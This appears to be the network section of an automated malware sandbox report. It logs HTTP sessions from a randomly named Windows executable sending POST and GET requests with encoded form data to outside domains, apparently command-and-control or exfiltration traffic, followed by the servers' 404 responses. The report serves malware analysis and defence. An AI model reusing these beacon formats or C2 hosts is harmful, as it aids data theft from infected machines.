                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                  Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.449768176.57.64.102805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:50.855351925 CEST10850OUTPOST /rgqx/ HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.ayypromo.shop
                  Referer: http://www.ayypromo.shop/rgqx/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 62 4e 77 32 50 63 76 58 72 35 2f 38 35 33 44 68 59 66 42 37 78 4e 6b 6a 39 6f 48 48 6a 45 6c 43 77 65 48 59 6f 2b 4d 45 2b 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 43 4a 74 37 64 30 37 36 62 70 56 55 78 75 6c 42 58 54 66 72 74 34 48 2b 48 43 79 70 55 54 43 71 42 69 58 38 50 68 55 67 68 4b 39 4f 31 4b 47 53 50 72 6b 46 68 6f 66 39 30 5a 5a 66 6d 39 4c 53 32 4a 78 59 68 61 66 74 55 38 67 43 4d 6a 49 72 33 39 [TRUNCATED]
                  Data Ascii: 56gD=p58IGnZR0XdFxFrMKyc9iNp7HOFc1GeixdXjd7VYNXSip4BEArEQLZOP/KbX5yvU9ieF8UYbgwOOxQr30g1B1arXJLT1mGbNtB33j6lFJsqI/amgVsM2ALchWBuM7J06hGU2FXMXU+C9bxJNSA7vU6kEh62dPb5L2m0DekEJWJVs+MpqnbNw2PcvXr5/853DhYfB7xNkj9oHHjElCweHYo+ME+xMhmxaR63MJ36kUqht80gRvsxAEICgHEmCJt7d076bpVUxulBXTfrt4H+HCypUTCqBiX8PhUghK9O1KGSPrkFhof90ZZfm9LS2JxYhaftU8gCMjIr39UqIpDeKx6HflYx0y49EFCsKsQtgWfS5I9rkvrNGxzlXF7eApF1CQD19JAQitKRH5dHq9kJcmnAPkkMq+aGmQBF+D3yglJcz2eKIF2YhishDGWW+EGRMH6QnBth0LzsF5aSG3Xc8x+PHeJ3jixmEQV0REcEOmAqHXYcEzBS1o5Ekq/VZyQOB73195TME3MZgOQKbmMop5gag5Y6Eh0Rbvn40eOZvo7ezA6Kv0fqTCjQSggLxyJ9lomL6MOdrbgR7V2LyxyM+/mBZj8IJWTuFLLpJe7RIfnO67iYZe9BRnKFbYECvfJ6UE0xe7I3B4wY/COK6fVCSavV0O5u5C7rKUTJxdwft8OUF2QAH+x7GwWIQwBL662Db5iNa2/Y+5DcY0fvap4jRdYVbVeBrepuFqDvZEUXNbQQ+kniTFCJAYfBKrsGVb+hpNepyZ6TS1jf2bRaWsvCX7vWjgWFaXIXjybLUVgCWR6GKOYSyIl6L4SP5UlPkyHLgQdsbW3x9oJtr4q8sHavr29S0+XYeCdjxCHRDz2tz4Ga8lCnIWn+Ex4IhxJiuS++BlKwxWTTAV73HEf78mieFzT6fYMZAJAhngeHQZ5ahPa0bzhxy4mUjvd/bzXiD9uDSsn+rodTSCWJlbUAng/6+loRHMQElV4Xywc3v7M4jO1qCZE1 [TRUNCATED]
                  Sep 4, 2024 09:37:51.763303995 CEST1147INHTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=sA3SAZhW47XbVhvsCNin; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:51 GMT
                  Date: Wed, 04 Sep 2024 07:37:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 738
                  Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                  ETag: "2e2-620a674a57ae6"
                  Accept-Ranges: bytes
                  X-Frame-Options: SAMEORIGIN
                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                  Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.449769176.57.64.102805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:53.400991917 CEST482OUTGET /rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:54.042309046 CEST727INHTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=wDtulPPKY6TqmR0BqDVC; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:53 GMT
                  Date: Wed, 04 Sep 2024 07:37:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 340
                  Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                  ETag: "154-56d5bbe607fc0"
                  X-Frame-Options: SAMEORIGIN
                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                  Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.449770162.55.254.209805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:37:59.105942965 CEST757OUTPOST /qpwk/ HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.anaidittrich.com
                  Referer: http://www.anaidittrich.com/qpwk/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 6d 44 4c 55 39 43 59 70 39 77 52 61 70 58 32 69 68 39 57 43 6c 4f 69 52 72 61 34 58 73 61 4c 6a 77 3d 3d
                  Data Ascii: 56gD=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8ZdrrmDLU9CYp9wRapX2ih9WClOiRra4XsaLjw==
                  Sep 4, 2024 09:37:59.808926105 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:37:59 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                  Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                  Sep 4, 2024 09:37:59.808948040 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                  Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                  Sep 4, 2024 09:37:59.808959961 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                  Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                  Sep 4, 2024 09:37:59.808970928 CEST672INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                  Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                  Sep 4, 2024 09:37:59.808983088 CEST1236INData Raw: 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d
                  Data Ascii: rker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
                  Sep 4, 2024 09:37:59.808994055 CEST1236INData Raw: 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63
                  Data Ascii: 9999px}</style><style id='wp-block-site-title-inline-css'>:root :where(.wp-block-site-title a){color:inherit}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-lay
                  Sep 4, 2024 09:37:59.809011936 CEST1236INData Raw: 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 31 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d
                  Data Ascii: =writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([sty
                  Sep 4, 2024 09:37:59.809022903 CEST1236INData Raw: 2e 36 38 34 68 31 2e 37 33 37 5a 27 29 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2a 20 48 69 64 65 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 69 66 20 74 68 65 20 68 65 61 64 69 6e 67
                  Data Ascii: .684h1.737Z');display: block;}/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;
                  Sep 4, 2024 09:37:59.809037924 CEST328INData Raw: 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f
                  Data Ascii: right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-search-inline-css'>.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{h
                  Sep 4, 2024 09:37:59.809051037 CEST1236INData Raw: 6c 69 67 6e 3a 74 65 78 74 2d 62 6f 74 74 6f 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 29 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 36 70
                  Data Ascii: lign:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{appeara
                  Sep 4, 2024 09:37:59.813962936 CEST1236INData Raw: 69 73 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 72
                  Data Ascii: is:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-search__input){font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:in


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.449771162.55.254.209805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:01.652968884 CEST777OUTPOST /qpwk/ HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.anaidittrich.com
                  Referer: http://www.anaidittrich.com/qpwk/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 71 52 4d 73 54 4d 61 76 6e 43 34 36 65 68 43 32 7a 2f 4e 33 34 4c 44 36 50 4b 54 5a 31 58 71 56 6b 3d
                  Data Ascii: 56gD=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQlqRMsTMavnC46ehC2z/N34LD6PKTZ1XqVk=
                  Sep 4, 2024 09:38:02.416063070 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:02 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
